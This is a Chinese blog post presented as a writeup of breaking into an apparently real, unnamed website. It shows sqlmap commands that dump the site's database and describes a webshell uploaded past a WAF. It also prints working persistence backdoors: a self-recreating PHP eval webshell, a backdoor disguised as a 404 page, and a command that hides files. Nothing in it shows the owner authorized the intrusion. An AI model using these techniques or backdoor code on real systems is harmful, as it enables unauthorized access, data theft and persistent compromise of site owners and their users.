【writeup】某站一次简单的渗透GetShell

前言


切记勿要违法犯罪

提要

已拿webshell,权限过低,自身技能储备不足,没有能力绕过提权, 先暂时放着,后面学习了再拿权限。

信息搜集

可以利用网络上强大的搜索引擎,或者Google hacking进行关键字搜索特定目标站点,这个以后单独开一篇。

找到目标站点

获取IP地址,nmap扫描端口

获取目标站点横幅

加载字典获取目标站点目录

获取到phpinfo信息

获取到web后台

获取到upload路径

发现注入点,进行手工测试

SQLmap测试

存在注入点,但是不要慌,看看能不能绕过

绕过成功!

外网入口利用

外网入口利用的办法有很多,这里我只阐述数据库注入,目标站点还有XSS漏洞getwebshell,不再阐述。

在本次渗透中,利用数据库注入点漏洞进行获取数据库有效信息,进而getwebshell

查询当前数据库

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-db

查询当前数据库用户

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-user

查询是否当前数据库是管理员用户

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --is-dba

查询数据库用户角色

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --roles


权限太低

查询所有数据库

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --dbs

爆表

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX --tables

爆字段

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T --columns

爆数据

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T -C  XXX  --dump


运气不错,密码没有md5加密,现在已经可以登录网站后台。

登录后台

发现fckeditor编辑器文件上传漏洞

查询编辑器版本

尝试文件上传

被拦截,谷歌了一下,imunify360 云waf,国外一个比较大型的安全厂商,我利用bp抓包,截断,文件包含,中间件解析,PHP CGI解析均被拦截,那么这个编辑器漏洞可能无法利用了。

发现意外上传点

在后台product栏目有个文件上传漏洞,这是原站上传pdf文件资料下载点,尝试base64加密传一句话利用蚁剑流量混淆加密传输成功绕过。

连接蚁剑


连接成功!

终端测试


权限太低了,除root账户外,几乎都没有任何账户能够登陆ssh和执行shell命令。

意外之喜


发现大佬已经光顾过这个站点,还留下了后门和大马,尝试bp爆破。

权限提升与维持

提权

自己暂时无法提权,经验不够(其实可以利用Linux内核进行提权,但是以往的内核提权服务器容易崩溃,所以没有尝试,以后有时间再来研究)

权限维持

在getshell后,往往因为内网渗透的需要不得不长时间对目标进行持续威胁(简称APT),因此需要进行权限维持,隐藏后门。

隐藏文件

attrib +s +h xxx.php  //隐藏xxx.php文件

attrib命令 用于修改文件属性
+s 设置系统文件属性
+h 设置隐藏属性

在文件夹下无法看到xxx.php,但仍然可以访问

不死马

<?php
set_time_limit(0);//程序执行时间
ignore_user_abort(1);//关掉终端后脚本仍然运行
unlink(__FILE__);//文件完整名
while(1){
file_put_contents('xxx.php','<?php $a=array($_REQUEST["xxx"]=>"3");
$b=array_keys($a)[0];
eval($b);?>');
sleep(5);
}
?>

该脚本每5秒向服务器创建xxx.php,并写入一句话免杀木马,结合attrib命令隐藏文件更好地建立后门。

404页面隐藏后门

<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
function func(){
    return @$_REQUEST["xxx"];
}
preg_replace("/xxx/e",func(),"i am xxx");
header('HTTP/1.1 404 Not Found');
?>

因为目标站点为Linux服务器,所以只列出了几个,windows的权限维持还可以利用.user.ini文件构成的PHP后门、建立影子账户、metasploit权限维持、shift后门、远程桌面会话劫持等方法,以后遇到了再说

内网渗透(暂停更新)

现在没时间,过段时间再更,写篇writeup太费时间了。。。
内网渗透可就好玩了,哈哈
等有时间再写进去。。。

Typecho赞赏功能

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

冷夜清风

(๑>ڡ<)☆谢谢老板们的投食~

使用微信扫描二维码完成支付


  Previous post ヨスガノソラ
Next post   Python学习笔记(一)

仅有一条评论

  1. x计划 x计划
    很细,思路清晰

添加新评论

选择表情

  TimeLine

这两天抽时间写,有点忙。。。
--- updated on 2020-08-05 23:20:06 星期三

  About Me

九零后,集美貌与才华于一身。
专业提供各种网络技术支持,欢迎叨扰。
工作方向:渗透测试,IT运维。

  Recent Comments

  •  头疼的高健: 不好意思,是我自己的问题,解压密码就是RONIN
  •  头疼的高健: 我从RoninYun上下载的压缩包 使用RONIN这个密码,解压报错啊 不知道哪里出问题了,谁...
  •  阿林: 问一下订阅链接在放在哪了
  •  云帆沧海: 历经小20天,备案终于通过了,欢迎光临我的小站 www.2288m.com
  •  如果当时: 以解决!
  •  如果当时: burp-loader-keygen.jar 我执行这个文件就闪退,这是什么原因。
  •  云帆沧海: 打卡
  •  云帆沧海: 你好,由于香港空间访问速度不理想,现在更换到国内腾讯云,2288m.com 域名正在备案中,网...
  •  DIDI: 所以.. 解压密码多少.. 哈哈
  •  zoe: 在cmd里先把keygen.exe拖进来,然后复制run那个框命令执行

只有脚踏实地的人,才能够说:路,就在我的脚下。

无论你选择做什么,追求完美的程度决定你成就的高度。

这个世界最脆弱的是生命,身体健康,很重要。

上帝说:你要什么便取什么,但是要付出相当的代价。

现在站在什么地方不重要,重要的是你往什么方向移动。